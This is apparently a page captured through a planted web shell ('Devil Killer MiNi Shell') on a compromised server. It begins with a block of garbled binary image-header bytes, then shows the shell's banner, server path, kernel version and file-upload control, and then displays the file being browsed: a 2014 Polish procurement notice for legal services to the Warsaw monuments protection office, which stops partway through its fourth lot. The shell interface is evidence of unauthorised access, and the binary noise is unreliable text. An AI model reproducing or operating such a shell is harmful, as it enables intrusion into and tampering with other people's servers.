JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141209/254565-N-2014.html

<p class="kh_header"><b>Warszawa: Świadczenie usług prawniczych dla Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie w 2015 roku, w szczególności dla urzędu w Warszawie oraz Delegatur urzędu w Ciechanowie, Ostrołęce, Płocku, Radomiu i Siedlcach z możliwością składania ofert częściowych w zakresie bieżącej obsługi prawnej i monitoringu otoczenia prawnego</b><br>
<b>Numer ogłoszenia: 254565 - 2014; data zamieszczenia: 09.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Ochrony Zabytków w Warszawie , ul. Nowy Świat 18/20, 00-373 Warszawa, woj. mazowieckie, tel. 22 4430400, faks 22 4430401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mwkz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług prawniczych dla Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie w 2015 roku, w szczególności dla urzędu w Warszawie oraz Delegatur urzędu w Ciechanowie, Ostrołęce, Płocku, Radomiu i Siedlcach z możliwością składania ofert częściowych w zakresie bieżącej obsługi prawnej i monitoringu otoczenia prawnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług prawniczych dla Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie w 2015 roku, w szczególności dla urzędu w Warszawie oraz Delegatur urzędu w Ciechanowie, Ostrołęce, Płocku, Radomiu i Siedlcach z możliwością składania ofert częściowych w zakresie bieżącej obsługi prawnej i monitoringu otoczenia prawnego zgodnie z obowiązującymi przepisami w tym w szczególności:
a)	Z ustawą o ochronie zabytków i opiece nad zabytkami i aktami wykonawczymi do tej ustawy,
b)	Ustawą prawo budowlane i aktami wykonawczymi do tej ustawy,
c)	Ustawą o zagospodarowaniu przestrzennym i aktami wykonawczymi do tej ustawy,
d)	Ustawą Prawo zamówień publicznych i aktami wykonawczymi do tej ustawy,
e)	Ustawą o finansach publicznych i aktami wykonawczymi do tej ustawy,
f)	Kodeksem postępowania administracyjnego,
g)	Ustawą o służbie cywilnej i aktami wykonawczymi do tej ustawy,
h)	Kodeksem pracy,
i)	Kodeksem cywilnym i kodeksem postępowania cywilnego,
j)	Kodeksem karnym i kodeksem wykonawczym,
k)	Kodeksem postępowania karnego,
l)	Kodeksem postępowania w sprawach o wykroczenia,
m)	Ustawy o postępowaniu egzekucyjnym w administracji,
n)	Innymi obowiązującymi przepisami związanymi przede wszystkim z ochroną zabytków i funkcjonowaniem służby cywilnej.

Z możliwością składania ofert częściowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiada wpis na listę radców prawnych bądź adwokatów [kopia wpisu]</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli Wykonawca wykaże, że w ciągu ostatnich 3 lat przed 	upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w 	tym okresie:
- wykonał przynajmniej 4 opinie/analizy prawne dotyczące ochrony zabytków dla jednostki administracji publicznej [zestawienie wraz z sygnaturą akt/sprawy].
- świadczył usługi prawnicze polegające na wykonaniu zastępstwa procesowego jednostki 	administracji publicznej przed sądem w co najmniej 4 różnych sprawach, których przedmiotem był 	spór pomiędzy jednostką administracji publicznej a innym podmiotem [zestawienie wraz z sygnaturą akt/sprawy]</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie, minimum 1 osobą, posiadającą specjalizację z zakresu prawa pracy, kodeksu   postępowania administracyjnego, ustawy o ochronie zabytków, prawa budowlanego i które posiadają prawo wykonywania zawodu adwokata lub radcy prawnego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponowanie, minimum 1 osobą, posiadającą specjalizację z zakresu prawa pracy, kodeksu   postępowania administracyjnego, ustawy o ochronie zabytków, prawa budowlanego i które posiadają prawo wykonywania zawodu adwokata lub radcy prawnego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzenia działalności prowadzenia spraw prawnych [kopia polisy ubezpieczeniowej]</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony i podpisany Formularz Ofertowy - załącznik nr 1 do SIWZ;
2)	Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów (odpisów), wymaga się złożenia dokumentu (w formie oryginału lub potwierdzonej notarialnie kopii-dotyczy wyłącznie pełnomocnictwa) wskazującego osobę uprawnioną do reprezentowania składającego ofertę;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.25</li>
<li>2 - doświadczenie w zakresie ochrony zabytków - 0.50</li>
<li>3 - doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umów stanowią załączniki: nr 8A (zadanie 1-6) i nr 8B (zadanie 7) do SIWZ;
Zawarcie umowy z podmiotami składającymi ofertę wspólną poprzedzone będzie wpisem 
do umowy klauzuli dotyczącej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mwkz.pl w zakładce zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na stronie internetowej www.mwkz.pl oraz w siedzibie urzędu 00-373 Warszawa, Nowy Świat 18/20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2014 godzina 09:45, miejsce: Wojewódzki Urzęd Ochrony Zabytków w Warszawie, ul. Nowy Świat 18/20, 00-373 Warszawa w Kancelarii na parterze urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Ciechanowie przy ulicy Strażackiej 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Ciechanowie przy ulicy Strażackiej 6, o charakterze stałym i w  zakresie:

a)	sporządzania opinii prawnych,
b)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
c)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
d)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu,
e)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
f)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, pism, zawieranych porozumień i innych dokumentów,
g)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
h)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
i)	udział w posiedzeniach stałych i doraźnych komisji:  kontrolnych, oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Delegatury Zamawiającego w Ciechanowie przy ul.  Strażackiej 6 w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.25</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.50</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Ostrołęce przy ulicy Kościuszki 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Ostrołęce przy ulicy Kościuszki 16, o charakterze stałym i w  zakresie:

a)	sporządzania opinii prawnych,
b)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
c)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
d)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu,
e)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
f)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, pism, zawieranych porozumień i innych dokumentów,
g)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
h)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
i)	udział w posiedzeniach stałych i doraźnych komisji:  kontrolnych, oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Delegatury Zamawiającego w Ostrołęce przy ul. Kościuszki 16 w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.25</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.50</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Płocku przy ulicy  Zduńskiej 13A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Płocku przy ulicy  Zduńskiej 13A, o charakterze stałym i w  zakresie:

a)	sporządzania opinii prawnych,
b)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
c)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
d)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu
e)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
f)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, zawieranych porozumień, pism i innych dokumentów,
g)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
h)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
i)	udział w posiedzeniach stałych i doraźnych komisji: oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Delegatury Zamawiającego w Płocku przy ul. Zduńskiej 13A  w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.25</li>
<li>2. doświadczenie w zakresie ochrony zabytków - 0.50</li>
<li>3. doświadczenie w zakresie wykonywania usług prawnych - 0.25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Radomiu przy ulicy Żeromskiego 53.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonawca zobowiązuje się świadczyć Zamawiającemu usługę prawną w Radomiu przy ulicy Żeromskiego 53, o charakterze stałym i w  zakresie:

a)	sporządzania opinii prawnych,
b)	realizacji porad prawnych, wyjaśnień i informacji (doradztwa prawnego),
c)	reprezentowania w postępowaniach windykacyjnych i egzekucyjnych w sprawach zleconych indywidualnie,
d)	przygotowania wzorów zarządzeń, pism, decyzji, projektów umów i innych dokumentów i aktów normatywnych dla urzędu,
e)	aktywnej pomocy prawnej dla pracowników urzędu, w szczególności rekomendowania zapisów prawnych,
f)	parafowania pod względem formalno-prawnym w szczególności decyzji, umów, zaświadczeń, pozwoleń, pism, zawieranych porozumień i innych dokumentów,
g)	konsultacji telefonicznych i mailowych w pilnych sprawach prawnych z pracownikami urzędu,
h)	udzielania wyjaśnień, sporządzania opinii i analiz prawnych w zakresie objętym  przedmiotem niniejszego zamówienia, w tym w szczególności analiz na gruncie regulacji prawa administracyjnego, ustawy Prawo zamówień publicznych, ustawy o ochronie zabytków, KPA, ustawy o służbie cywilnej, ustawy prawo budowlane, ustawy o zagospodarowaniu przestrzennym, ustawy o finansach publicznych, prawa pracy, prawa i postępowania cywilnego, administracyjnego, karnego, postępowania w sprawach o wykroczenia, ustawy o postępowaniu egzekucyjnym w Administracji oraz aktów wykonawczych do tych ustaw,
i)	udział w posiedzeniach stałych i doraźnych komisji:  kontrolnych, oraz w miarę potrzeb w przygotowywaniu postępowań, w szczególności dotyczących zamówień publicznych,

w siedzibie Delegatury Zamawiającego w Radomiu przy ul. Żeromskiego 53 w wymiarze 4 godzin pracy Wykonawcy w tygodniu (16 godzin miesięcznie), prowadzonych w formie dyżurów ustalonych w porozumieniu z Mazowieckim Wojewódzkim Konserwatorem Zabytków. Wykonawca jest zobowiązany do wykonywania usługi osobiście. W szczególności w przypadku braku możliwości uczestniczenia Wykonawcy w wyznaczonym dyżurze jest on zobowiązany do wyznaczenia swojego zastępcy posiadającego tożsame wykształcenie, umiejętności i uprawnienia wskazane w ust. V..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.25</li>
